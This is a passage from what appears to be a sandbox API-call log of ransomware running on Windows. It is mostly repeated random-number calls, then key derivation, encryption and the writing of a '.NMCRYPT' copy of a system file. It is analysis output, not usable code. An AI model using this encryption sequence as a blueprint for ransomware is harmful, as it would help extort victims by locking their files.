dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.505] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.506] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.507] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0155.507] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0155.508] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0155.508] CryptHashData (hHash=0x9ad2b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0155.508] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad2b8, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad278) returned 1 [0155.508] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0155.508] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0155.508] wcslen (_String="\\\\?\\") returned 0x4 [0155.508] CryptDuplicateKey (in: hKey=0x9ad278, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad838) returned 1 [0155.508] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0155.508] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0155.509] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=215) returned 1 [0155.509] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) 